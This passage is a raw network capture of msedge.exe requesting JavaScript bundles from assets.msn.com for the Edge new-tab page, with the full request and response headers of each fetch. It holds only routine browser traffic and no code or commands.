access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/trendingTopics.0cf9d40ec096d7d8f45d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/trendingTopics.0cf9d40ec096d7d8f45d.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: /R57Ri9b2ynRyMxgM4qdYQ==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF566E499
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 852a1b71-f01e-002b-125a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431614931,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ebd3
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/vertical-left-nav.8b69a442fc82d0d00a34.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/vertical-left-nav.8b69a442fc82d0d00a34.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nxNm3IKLFimItb3vN4oGzA==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF777EAF9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 852a0a0f-f01e-002b-0f5a-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431615012,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ec24
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/video-shopping-card.79789aa8d7167d23cc9c.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/video-shopping-card.79789aa8d7167d23cc9c.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: HLh3Xm0RAD/nwQ7tfo6oTw==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7B6BF81
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3466b520-b01e-006b-345d-146aad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431615074,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=17, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ec62
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/videoCard.b014118035121ed131a0.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/videoCard.b014118035121ed131a0.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: vgjYdUhivmMGAfjej8+EZA==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF5244015
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: af602b56-801e-0060-7f5c-144fba000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:43 GMT
akamai-request-bc: [a=88.221.24.111,b=431615157,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ecb5
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/voice-search-wc.0da68c02655517a26ec3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/voice-search-wc.0da68c02655517a26ec3.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: BiGharcK8UXKQiTIsHmF+A==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7441144
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 51f9e255-101e-005d-435c-14b1b0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:43 GMT
akamai-request-bc: [a=88.221.24.111,b=431615261,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ed1d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/VpReadyHelper.a75547cb104126095d6f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/VpReadyHelper.a75547cb104126095d6f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 1mFoSudnugdVK4W+ARBHJw==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079F4CBA7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 22d668d5-b01e-00ab-8074-13eee9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:43 GMT
akamai-request-bc: [a=88.221.24.111,b=431615561,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9ee49
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_content-video-player_dist_index_js.1cf6dc1d550b48556b34.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_content-video-player_dist_index_js.1cf6dc1d550b48556b34.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Tb/Xp0CxUnZTx18yu1h38g==
last-modified: Fri, 16 Dec 2022 21:57:04 GMT
etag: 0x8DADFB0781EF0E1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e8e2b7d7-401e-00bc-4bf8-138fc5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:43 GMT
akamai-request-bc: [a=88.221.24.111,b=431615918,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9efae
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_inline-location-settings_dist_index_js.86f368ebdf16981812d3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_inline-location-settings_dist_index_js.86f368ebdf16981812d3.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 0PjaZgGjd4wT71uUzhHoGw==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF4EA73D2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1141611a-c01e-000c-515a-14f981000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:43 GMT
akamai-request-bc: [a=88.221.24.111,b=431616257,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=34, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f101
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_native-ad-video_dist_index_js.ae9e740a9c7a71fd27cd.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_native-ad-video_dist_index_js.ae9e740a9c7a71fd27cd.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Wi7pI5bRUSpvxHUIDY2fkw==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF82FAE68
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621fa31e-901e-0001-455a-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:43 GMT
akamai-request-bc: [a=88.221.24.111,b=431616428,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f1ac
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_stock-chart_dist_index_js.dd9b8aeb8fe0a92c79a2.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_stock-chart_dist_index_js.dd9b8aeb8fe0a92c79a2.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: mXeXTW6MyAEZ0yiiAGyyug==
last-modified: Tue, 20 Dec 2022 23:56:08 GMT
etag: 0x8DAE2E5C3AC8C74
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 028c2744-e01e-008a-21c6-1654d8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:43 GMT
akamai-request-bc: [a=88.221.24.111,b=431616498,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=29, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f1f2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-cards_dist_cards_sub-components_card-action-tray_OptedOutReactionTemplate_js.985cdbd0b726e7133ac5.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-cards_dist_cards_sub-components_card-action-tray_OptedOutReactionTemplate_js.985cdbd0b726e7133ac5.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: PSpM8KBBTf89HApNv9iFkg==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C1395042
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 68409381-901e-0001-3897-1a269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431616722,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f2d2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedAdsCTAModule_js.037b97026b9a66132027.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedAdsCTAModule_js.037b97026b9a66132027.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: RWY7XBfU+MUAitv94w9zCw==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07A975C74
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1271b095-501e-00a5-4f99-114cf4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431616857,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=28, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f359
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedAdsLoggingModule_js.a8d252d6e629326178be.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedAdsLoggingModule_js.a8d252d6e629326178be.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: CpfB3w7zAsEEbInAvwx6hQ==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF7F9B21E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: feef8c79-201e-00ee-745d-14baf2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431616928,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f3a0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedDescriptionModule_js.e81bb4ffa3fc37eba8de.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedDescriptionModule_js.e81bb4ffa3fc37eba8de.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: JjJB6Fnf3uN7r1J5V4rKnw==
last-modified: Fri, 16 Dec 2022 21:57:04 GMT
etag: 0x8DADFB077B2D15F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a4004f02-b01e-00d3-509a-1144f8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617018,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f3fa
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedEntNewsModule_js.f1a06ef0cca19a5aba46.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedEntNewsModule_js.f1a06ef0cca19a5aba46.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: vPZOwEhC9Zv4ZtAo4TzRcw==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF678A1B1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3466b9e4-b01e-006b-6f5d-146aad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617115,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9f45b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedHoverScaleImageModule_js.ccdaa049c75d4b4d6829.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedHoverScaleImageModule_js.ccdaa049c75d4b4d6829.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ttUKwvwf905agav1Hv5S8A==
last-modified: Fri, 16 Dec 2022 21:57:10 GMT
etag: 0x8DADFB07BA1799A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1e89cc66-201e-0086-809a-11a0c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:44 GMT
akamai-request-bc: [a=88.221.24.111,b=431617217,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
